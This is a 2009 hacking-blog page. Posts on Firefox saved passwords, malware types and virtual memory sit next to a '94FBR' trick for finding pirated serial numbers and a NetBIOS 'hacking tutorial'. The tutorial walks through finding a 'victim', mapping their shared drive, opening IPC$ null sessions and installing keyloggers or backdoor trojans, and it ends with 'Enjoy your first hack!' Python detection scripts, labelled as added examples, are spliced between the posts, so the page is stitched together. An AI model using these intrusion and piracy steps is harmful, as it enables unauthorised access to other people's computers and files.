Saturday, February 21, 2009
HACK PASSWORD FROM FIREFOX 3.0
Whenever you log in to a website using your username and password, Firefox 3.0 asks whether you'd like it to remember the password. If you click Remember, the next time you visit the website it will automatically enter the username and password for your convenience.
Now, back to the topic. Let's say you saved your Gmail password in Firefox. Months or years go by and you no longer remember the password you set for your Gmail account. You start to panic and desperately need to get your Gmail password back. Don't worry, here's how you can find the hidden Gmail password in Firefox.
Firefox 3.0 is much better than Internet Explorer at managing "remembered" logins. In Internet Explorer, there is no built-in feature where you can manage or view your saved login information. That's why you need third-party tools to reveal the passwords hidden under asterisks. In Firefox 3.0, you can access remembered passwords with a few clicks.
To view your remembered passwords in Firefox, go to Tools and click on Options. Go to the Security tab and click on the Show Passwords button. A remembered-passwords dialog box will appear. Click on the Show Passwords button again and a new column with the passwords will appear.
Friday, February 20, 2009
ALL ABOUT TROJAN,VIRUS,WORM,SPYWARE,LOGIC BOMB
Trojan:
A Trojan is not a computer virus in the sense that it doesn't get into
your system and self-replicate. The Trojan derives its name from
the ancient Greek story of the Trojan Horse, where a group of
warriors invades a city by hiding within a giant wooden horse. The
residents of the city thought the horse to be a gift, never knowing
what was hidden inside, so they rolled the horse in, bringing their
enemy within the city walls with it. The Greek Trojan horse
appeared to be something that it was not, just as the computer
Trojan is. A computer Trojan is software that appears to function in
a certain way, when in reality it performs another action. A Trojan is
not always harmful and damaging to your system, but it can open a
back door for hackers to get into your computer and cause damage
or retrieve information. It is a program which does an unauthorized
function, hidden inside an authorized program. It does something other
than what it claims to do, usually something malicious,
and it is intended by the author to do whatever it does. If it's not
intentional, it's called a 'bug' or, in some cases, a feature :) Some
virus scanning programs detect some trojans. Some virus scanning
programs don't detect any trojans. No virus scanners detect all
Trojans.
Virus:
Computer Viruses have been around since the early 1980's.
A virus is an independent program which reproduces itself. It may
attach to other programs, it may create copies of itself (as in
companion viruses). It may damage or corrupt data, change data, or
degrade the performance of your system by utilizing resources such as
memory or disk space. Some virus scanners detect some viruses. No
virus scanners detect all viruses. No virus scanner can protect
against "any and all viruses, known and unknown, now and forevermore",
because every antivirus updates its database after the virus comes into
existence.
Worm:
Made famous by Robert Morris, Jr., worms are programs which reproduce
by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems.
Computer worms are like viruses in that they self-replicate
within your computer system. However, a computer worm
does not have to attach itself to a program in your system like a computer
virus does in order to function. Also, unlike a computer virus that generally corrupts
and modifies files on your computer to cause damage, a computer worm
generally localizes its damage to the computer network. Computer worms
can often spread via email, as the SoBig and MyDoom worms did
(from 2003 and 2004 respectively). They are self-contained and use networks
to spread, in much the same way viruses use files to spread.
Spyware:
Software that covertly gathers user information through the user's Internet
connection without his or her knowledge, usually for advertising purposes.
Spyware applications are typically bundled as a hidden component of freeware
or shareware programs that can be downloaded from the Internet; however, it should
be noted that the majority of shareware and freeware applications do not come with
spyware. Once installed, the spyware monitors user activity on the Internet and
transmits that information in the background to someone else. Spyware can also
gather information about e-mail addresses and even passwords and credit card numbers.
Aside from the questions of ethics and privacy, spyware steals from the user by using
the computer's memory resources and also by eating bandwidth as it sends information
back to the spyware's home base via the user's Internet connection. Because spyware
is using memory and system resources, the applications running in the background can
lead to system crashes or general system instability. Because spyware programs exist as
independent executables, they have the ability to monitor keystrokes, scan
files on the hard drive, snoop on other applications such as chat programs or word
processors, install other spyware programs, read cookies, and change the default home
page on the Web browser, consistently relaying this information back to the spyware
author, who will either use it for advertising/marketing purposes or sell the information
to another party.
Logic Bomb:
Code which will trigger a particular form of 'attack' when a
designated condition is met. For instance, a logic bomb could delete
all files on Dec. 5th. Unlike a virus, a logic bomb does not make
copies of itself.
While different in the functions they perform, Viruses, Trojans, Worms and
Spyware are all damaging to your computer. It is most important
that you have proper computer protection software in place
that will protect you from these things so they cannot get into your computer
and cause damage.
VIRTUAL MEMORY
VIRTUAL MEMORY AND HOW MUCH VIRTUAL MEMORY YOU NEED FOR YOUR SYSTEM.
Today's applications are getting bigger and bigger. They therefore require more system memory to hold the application's data, instructions, and threads and to load it. The system needs to copy the application data from the HDD into system memory in order to process and execute it. Once the memory fills up with data, the system will stop loading the program. In this case, users need to add more memory to their system to support that intensive application. However, adding more system memory costs money, and a normal user may only need to run the memory-intensive application for one or two days. Virtual memory was introduced to solve that type of problem.
There are two types of memory, which are as follows:
System Memory :- System memory is memory that is used to store application data and instructions so that the system can process and execute them. When you install memory sticks to increase the system RAM, you are adding more system memory. System memory is also known as physical memory or main memory.
Virtual Memory :- Virtual memory uses a portion of HDD space as memory to store application data and instructions that the system has deemed it doesn't need to process for now. Virtual memory is also known as logical memory, and it is controlled by the operating system, which is Microsoft Windows. Virtual memory can be added in the system configuration.
Virtual memory is a portion of HDD space used as memory. It stores application data and instructions that the system does not currently need to process.
During the program loading process, the system copies the application data and instructions from the HDD into main memory (system memory) so that it can use its resources, such as the CPU, to process and execute them. Once system memory fills up, the system starts moving data and instructions that don't need to be processed anymore into virtual memory until they need to be processed again. This lets the system fetch the next application data and instructions and copy them into main memory in order to process the rest and load the program. When data and instructions in virtual memory need to be processed again, the system first checks main memory for space. If there is space, it simply swaps them into main memory. If there is no space left in main memory, the system first moves any data and instructions that don't need to be processed from main memory into virtual memory, and then swaps the data and instructions that need to be processed from virtual memory into main memory.
Setting the virtual memory size too low or too large (meaning above double the system memory) is not a good idea. If you set it too low, the OS will keep issuing an error message that states either Not enough memory or Virtual too low. This is because some portion of system memory is used to store the OS kernel, which must remain in main memory all the time, so the system needs space to store process data and instructions that are not currently needed when main memory fills up. Setting the virtual memory size too large to support an intensive application is also not a good idea, because it causes performance lag and takes up free HDD space: the system needs to transfer the application data and instructions back from virtual memory to system memory. The ideal size for virtual memory is the default size, and it should not exceed triple the size of system memory.
How much virtual memory you need depends on the system, since each user's system contains a different amount of RAM. By default, the OS sets the appropriate size for virtual memory. The default and appropriate size of virtual memory is:
CODE
* 1.5 =
.
For example, if your system contains 256 MB of RAM, you should set 384 MB for Virtual Memory.
CODE
256 MB of RAM (Main Memory) * 1.5 = 384 MB for Virtual Memory
If you would like to see how much virtual memory your system has and/or would like to configure and add more virtual memory, follow the procedure below. The procedure is based on Windows XP Professional.
1-1) Right-click My Computer and choose Properties
1-2) In the System Properties dialog box, go to the Advanced tab
1-3) Click the Settings button in the Performance frame
1-4) Once Performance Options shows up on the screen, go to the Advanced tab
1-5) Under the Advanced tab, click the Change button in the Virtual Memory frame to access the Virtual Memory setting
The Virtual Memory dialog box then appears on the screen. There you can check how much virtual memory you have set. If you would like to modify the size of virtual memory, follow the procedure below.
2-1) Select the drive letter on which the operating system is installed
2-2) Choose the option that says, "Custom Size:"
Once you choose that option, the Initial Size and Maximum Size settings become available. Initial Size (MB) means the actual size of virtual memory, and Maximum Size (MB) means the maximum size that virtual memory is allowed to use.
Let's say your system contains 512 MB of RAM; then the ideal setting for virtual memory is as follows:
CODE
Initial Size (MB): 768
Maximum Size (MB): 1500
Once you are happy with that virtual memory size, click the Set button under Paging file size for selected drive to apply the setting. Then click the OK button to apply the setting.
That's where you can manage and configure the size of virtual memory.
To maintain good overall system performance, you should use the default size as the actual size of virtual memory and triple the size of main memory as the maximum size of virtual memory. If you find that main memory plus virtual memory is not big enough to load the intensive application, then you will need to add more main memory to your system.
GET THE SERIAL NUMBER YOU NEED !
1. Go to Google.
2. In the search field type: "Product name" 94FBR
3. Where, "Product Name" is the name of the item you want to find the serial number for.
4. And then there you go - the serial number you needed.
HOW DOES THIS WORK?
Quite simple really. 94FBR is part of the CD key of many distributed software products.
By searching for the product name and 94FBR, you are guaranteed two things.
1) The pages that are returned are pages dealing specifically with the product you want a serial for.
2) Because 94FBR is part of a serial number, any page returned is guaranteed to be a serial number list page.
See these example searches:
"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero 8" 94FBR
"Windows vista" 94FBR
Thursday, February 19, 2009
CHANGE THE PASSWORD XP
1. FIRST GO TO THE START BUTTON.
2. THEN GO TO RUN.
3. RUN CMD.
4. FIRST RUN THE NET USER COMMAND TO SEE WHICH USERS ARE ON YOUR SYSTEM.
5. THEN RUN NET USER "USER NAME" "PASSWORD", WITHOUT THE DOUBLE QUOTES, FOR THE USER WHOSE PASSWORD YOU WANT TO CHANGE.
6. IT THEN DISPLAYS "THE COMMAND COMPLETED SUCCESSFULLY".
7. AND YOU HAVE HACKED XP BY CHANGING THE PASSWORD.
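Detection logic for the steps above, as an added example that is not part of the original post: it classifies `net user` command lines taken from process-creation logging, masks any password typed on the command line, and flags a password change that follows account enumeration by the same account. The record layout, the sample events and the 10-minute window are assumptions made for illustration.

```python
import re
import shlex
from datetime import datetime, timedelta

# Constructed process-creation records: (timestamp, account, command line).
SAMPLE_EVENTS = [
    ("2009-02-19T10:01:12", "alice", "net user"),
    ("2009-02-19T10:01:40", "alice", "net user bob NewPass123"),
    ("2009-02-19T10:05:02", "admin",
     r'C:\WINDOWS\system32\net.exe user "guest user" *'),
    ("2009-02-19T10:07:30", "admin", "net user carol /active:no"),
    ("2009-02-19T10:09:00", "alice", "net view"),
    ("2009-02-19T10:11:45", "admin", "net1 user dave S3cret! /add"),
]


def _tokens(command_line):
    """Split a Windows command line, keeping quoted arguments together."""
    try:
        parts = shlex.split(command_line, posix=False)
    except ValueError:          # unbalanced quote: fall back to whitespace
        parts = command_line.split()
    return [p.strip('"') for p in parts]


def classify_net_user(command_line):
    """Classify a `net user` invocation; return None for anything else."""
    tokens = _tokens(command_line)
    if len(tokens) < 2:
        return None
    program = re.split(r"[\\/]", tokens[0])[-1].lower()
    if program.endswith(".exe"):
        program = program[:-4]
    if program not in ("net", "net1") or tokens[1].lower() != "user":
        return None

    args = list(enumerate(tokens))[2:]
    positional = [(i, t) for i, t in args if not t.startswith("/")]
    switches = [t.lower() for _, t in args if t.startswith("/")]

    if not positional:
        kind = "enumerate"              # step 4 of the post: list accounts
    elif len(positional) == 1:
        kind = "account_change" if switches else "account_query"
    elif "/add" in switches:
        kind = "account_add"
    elif positional[1][1] == "*":
        kind = "password_prompt"        # password typed interactively
    else:
        kind = "password_set"           # step 5: password on the command line

    # Never copy a cleartext password into an alert: mask the second argument.
    safe = list(tokens)
    if len(positional) >= 2 and positional[1][1] != "*":
        safe[positional[1][0]] = "<redacted>"
    safe_command = " ".join('"%s"' % t if " " in t else t for t in safe)
    user = positional[0][1] if positional else None
    return {"kind": kind, "user": user, "safe_command": safe_command}


def find_password_changes(events, window=timedelta(minutes=10)):
    """Return alerts for password changes, noting prior account enumeration."""
    last_enum = {}                      # account -> time of last bare `net user`
    alerts = []
    for stamp, account, command_line in sorted(events):
        info = classify_net_user(command_line)
        if info is None:
            continue
        when = datetime.fromisoformat(stamp)
        if info["kind"] == "enumerate":
            last_enum[account] = when
        elif info["kind"] in ("password_set", "password_prompt"):
            seen = last_enum.get(account)
            alerts.append({
                "time": stamp,
                "account": account,
                "target": info["user"],
                "kind": info["kind"],
                "command": info["safe_command"],
                "after_enumeration": seen is not None and when - seen <= window,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_password_changes(SAMPLE_EVENTS):
        print(alert)
```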
NETBIOS HACKING
Decided to put this here instead of windows because it really is for beginners.
NETBIOS BASED HACKING TUTORIAL BY PIYUSH PRAKASH PUJARI
gkverma@msn.com
Preface
Dear reader, I have written this tutorial keeping in mind that readers having only basic knowledge will also be able to understand how hackers hack using NetBIOS. Using NetBIOS for hacking is probably the easiest way to hack remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one who hacks computer networks not for antisocial reasons but to let the network administrators know about the security holes so that they can protect their computers from hacking. If you want to contact me, please send me a mail at gaurav@sec33.com
Contents-
A brief lesson on NetBIOS
The NBTSTAT command
What you need to hack?
Types of attacks
Searching for a victim
Let's Hack - Part 1 Remotely reading/writing to a victim's computer
Cracking "Share" passwords
Using IPC$ to hack Windows NT
Penetrating in to the victim's computer
Let's Hack - Part 2 Denial of service attack
How to protect yourself
_______________________________________________________________________________
______________________________
A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows operating systems (like Windows 98, Windows Me, Windows NT etc.), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computers. Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network by issuing a command to NetBIOS. NetBIOS gives the names of the computers that have been registered. In short, NetBIOS gives various information about the computers on a network. This includes:
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service, it works on a port. It has been assigned port number 139.
________________________________________________________________________________
______________________________
THE NBTSTAT COMMAND
You can manually interact with NetBIOS with the help of the NBTSTAT command. To use this command, click on the Start button, then select RUN... and type "command" without quotes to launch the MS-DOS Command Prompt. Alternatively, you may click on the Start button, then go to Programs and select Command Prompt. Once you are in Command Prompt you can exit by typing the command EXIT. To launch Command Prompt in full-screen mode, press the ALT+ENTER key combination. To get back to the original window, press ALT+ENTER again. If you have launched the command prompt you will get
c:\windows>
If you do not see windows displayed after c:\, don't worry, just keep going; all the required commands will work fine.
Now let's play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command, type NBTSTAT/? at the prompt, i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name            Number   Type   Usage
==========================================================================
workgroup       00       G      Domain Name
my_computer     03       U      Messenger Service
myusername      03       U      Messenger Service
MAC Address = 00-02-44-14-23-E6
Please note that we have used 127.0.0.1 as our IP address. This IP address is called the "loopback" IP address because it always refers to the computer you are using.
This example is self-explanatory, so we need not go into details. We need to know about the Name and Number. The Name column displays the NetBIOS name, and there is a corresponding hexadecimal number. You may see some additional names in your case.
If you want to get the NetBIOS names of a remote computer, the command is
c:\windows>nbtstat -a ipaddress
Example - To get the NetBIOS names of a computer having the IP address 203.195.136.156, we shall use the command
NOTE - 203.195.136.156 may be an active IP address of someone's computer. I am using it only as an example. Please don't hack this computer.
c:\windows>nbtstat -a 203.195.136.156
________________________________________________________________________________
____
WHAT YOU NEED TO HACK
All you need is a Windows-based operating system like Windows 98 or Me (but I prefer Windows NT, 2000, XP) and an Internet connection.
________________________________________________________________________________
____________________________
TYPES OF ATTACKS
We can launch two types of attack on the remote computer having NetBIOS.
1. Reading/Writing to a remote computer system
2. Denial of Service
________________________________________________________________________________
_____________________________
Searching for a victim
You may manually search for the victims by first using nbtstat -a ipaddress and then net view \\ipaddress. If at first you don't succeed, step to the next IP address until you find a suitable IP address. You may also use a port scanner. A port scanner is simply software that can search any block of IP addresses, say 192.168.0.1 to 192.168.0.255, for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
________________________________________________________________________________
____________________________
Let's Hack - Part 1 Remotely reading/writing to a victim's computer
Believe it or not, NetBIOS is the easiest method to break into somebody's computer. However, there is a condition that must be satisfied before you can hack: the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it, the nbtstat command will display one more NetBIOS name. Now let us take an example. Suppose you know an IP address that has enabled File And Printer Sharing, and suppose the IP address happens to be 203.195.136.156.
If you don't know the IP address where File and Printer Sharing is enabled, read "Searching for a victim".
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name                 Type      Status
---------------------------------------------
user         <00>    UNIQUE    Registered
workgroup    <00>    GROUP     Registered
user         <03>    UNIQUE    Registered
user         <20>    UNIQUE    Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
---------------------------------------------------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20>. This shows that the victim has not enabled File And Printer Sharing.
2. You get "Host Not found". This shows that port 139 is closed or the IP address doesn't exist.
---------------------------------------------------------------------------------------------------------
Now our next step is to view the drives or folders the victim is sharing.
We will use the command
c:\windows>net view \\203.195.136.156
Let us suppose we get the following output
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name    Type     Used as    Comment
-----------------------------------------------
CDISK         Disk
The command completed successfully.
"Disk" shows that the victim is sharing a disk named CDISK. You may also get some additional information like
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name    Type     Used as    Comment
-----------------------------------------------
HP-6L         Print
"Print" shows that the victim is sharing a printer named HP-6L.
If we are able to connect to the victim's shared hard disks, folders or printers, we will be able to read and write to those folders or hard disks, and we may also be able to print anything on a remote printer! Now let us connect to the victim's shared hard disk or printer.
Till now we know that there is a computer whose IP address happens to be 203.195.136.156, that File and Printer Sharing is enabled on that computer, and that the victim's hard disk is shared under the name CDISK.
Now we will connect our computer to that hard disk. After we have connected successfully, a drive will be created on our computer, and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK, our drive will have the same contents as CDISK.
Let's do it.
We will use the NET command to do our work.
Let us suppose we want to make a drive k: on our computer and connect it to the victim's share. We will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace the letter k by any other letter.
If the command is successful we will get the confirmation
The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just created a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
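The nbtstat and net view outputs walked through above can be checked against your own machines with a short script. The following is an added example, not part of the original tutorial: it parses captured output in the format quoted on this page and reports whether the <20> name and any Disk or Print shares are advertised. The sample captures, the 192.0.2.10 address and all function names are constructed for illustration.

```python
import re

# Suffix meanings for the name-table rows shown on this page.
SUFFIX_MEANING = {
    0x00: "Workstation service or workgroup name",
    0x03: "Messenger service (computer or user name)",
    0x20: "Server service (File and Printer Sharing)",
}
# One name-table row, e.g. "user <20> UNIQUE Registered".
NAME_ROW = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+\S+\s*$")
# One share row, e.g. "CDISK Disk"; share names containing spaces are not handled.
SHARE_ROW = re.compile(r"^\s*(\S+)\s+(Disk|Print)\b")

# Constructed sample captures, modelled on the outputs quoted in the tutorial.
SAMPLE_NBTSTAT = """\
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
"""
SAMPLE_NET_VIEW = """\
Shared resources at \\\\192.0.2.10
Share name Type Used as Comment
-----------------------------------------------
CDISK Disk
HP-6L Print
The command completed successfully.
"""


def parse_nbtstat(text):
    """Return (name, suffix, kind) tuples from captured `nbtstat -a` output."""
    rows = []
    for line in text.splitlines():
        m = NAME_ROW.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2), 16), m.group(3)))
    return rows


def parse_net_view(text):
    """Return {share_name: type} from captured `net view` output."""
    return {m.group(1): m.group(2)
            for m in map(SHARE_ROW.match, text.splitlines()) if m}


def audit_host(nbtstat_text, net_view_text=""):
    """Summarise what one of your own hosts advertises over NetBIOS."""
    if "host not found" in nbtstat_text.lower():
        return {"reachable": False, "file_sharing": False, "findings": [], "shares": {}}
    rows = parse_nbtstat(nbtstat_text)
    findings = sorted({f"{name}<{suffix:02X}> {kind}: {SUFFIX_MEANING.get(suffix, 'other service')}"
                       for name, suffix, kind in rows})
    return {
        "reachable": True,
        "file_sharing": any(suffix == 0x20 for _, suffix, _ in rows),
        "findings": findings,
        "shares": parse_net_view(net_view_text),
    }


if __name__ == "__main__":
    report = audit_host(SAMPLE_NBTSTAT, SAMPLE_NET_VIEW)
    for line in report["findings"]:
        print(line)
    print("file sharing exposed:", report["file_sharing"], report["shares"])
```

A host that reports file_sharing as True with a non-empty shares map is one where File and Printer Sharing should be switched off or the shares restricted.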
________________________________________________________________________________
Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker, "PQWAK". All you have to do is enter the IP address and the share name and it will decrypt the password within seconds. Please note that this can crack passwords only if the remote operating system is one of -
Windows 95
Windows 98
Windows Me
________________________________________________________________________________
Using IPC$ to hack Windows NT,2000,XP
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker. It is simply a string that tells the remote operating system to give guest access, that is, to give access without asking for a password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace the letter k by any other letter. If you replace it by "b" (type without quotes) a new drive will be created with the drive letter b.
Please note that you won't be able to get access to the victim's shared drives, but you can gather valuable information like all the usernames, users that have never logged on, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - it's my favorite tool, however it is run from the command prompt.
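When logon auditing is enabled, a connection to IPC$ with an empty user name and password, as in the net use command above, is recorded on the target as a network logon by the ANONYMOUS LOGON account. The following is an added example, not part of the original tutorial: it counts such logons per source address in an exported Security log. The CSV column order, the sample rows and the trusted_nets parameter are assumptions made for illustration.

```python
import csv
import io
import ipaddress
from collections import Counter

# Successful network logon events: 540 on Windows 2000/XP/2003, 4624 on later versions.
NETWORK_LOGON_EVENT_IDS = {"540", "4624"}
NETWORK_LOGON_TYPE = "3"                  # logon type 3 = over the network
NULL_SESSION_ACCOUNT = "ANONYMOUS LOGON"  # account name recorded for a null session

# Constructed sample export, not real log data.
# Assumed column order: time, event_id, logon_type, account, source_ip
SAMPLE_EVENTS = """\
2009-02-20T10:01:12,540,3,ANONYMOUS LOGON,198.51.100.23
2009-02-20T10:01:15,540,3,ANONYMOUS LOGON,198.51.100.23
2009-02-20T10:02:40,540,3,alice,192.168.0.14
2009-02-20T10:05:03,540,3,ANONYMOUS LOGON,192.168.0.20
2009-02-20T10:07:51,528,2,bob,-
2009-02-20T10:09:30,4624,3,ANONYMOUS LOGON,203.0.113.9
2009-02-20T10:11:02,540,3,ANONYMOUS LOGON,-
"""


def find_null_sessions(export_text, trusted_nets=("192.168.0.0/24",)):
    """Count anonymous network logons per source address outside trusted_nets."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = Counter()
    for row in csv.reader(io.StringIO(export_text)):
        if len(row) != 5:
            continue  # skip blank or malformed lines
        _time, event_id, logon_type, account, source_ip = (c.strip() for c in row)
        if event_id not in NETWORK_LOGON_EVENT_IDS or logon_type != NETWORK_LOGON_TYPE:
            continue  # not a network logon
        if account.upper() != NULL_SESSION_ACCOUNT:
            continue  # authenticated user, not a null session
        try:
            addr = ipaddress.ip_address(source_ip)
        except ValueError:
            addr = None  # source address not recorded, e.g. "-"
        # Anonymous logons between LAN peers are routine, so trusted ranges are skipped.
        if addr is not None and any(addr in net for net in nets):
            continue
        hits[source_ip] += 1
    return dict(hits)


if __name__ == "__main__":
    for source, count in sorted(find_null_sessions(SAMPLE_EVENTS).items()):
        print(f"{count} anonymous network logon(s) from {source}")
```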
________________________________________________________________________________
Penetrating in to the victim's computer
Now that you have access to a remote computer you may be interested in viewing his secret emails, downloading his mp3 songs, and more...
But if you think like a hard core hacker you would like to play some dirty tricks: you may wish to install a key logger, install a back door entry Trojan like netbus and backorifice, or delete or copy some files. All these tasks involve writing to the victim's hard disk. For this you need to have write access permission.
________________________________________________________________________________
Lets Hack - Part 2 Denial of service attack
This type of attack is meant to be launched by computer techies, because it involves using the Linux operating system and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder, securityfocus etc. and compile it.
The two most common vulnerabilities found in NetBIOS are
Vulnerability 1
Vulnerability 2
Another vulnerability that has been found recently is that one can launch a DoS attack against Windows NT, 2000, XP and .NET systems. For detailed information and the patch please visit this link: http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.
________________________________________________________________________________
How to protect yourself
Please visit windowsupdate.microsoft.com and let Windows update itself.
________________________________________________________________________________
The above tutorial has been written by PIYUSH PRAKASH PUJARI
If you need more help please feel free to email me PIYUSHPUJARI123@GMAIL.com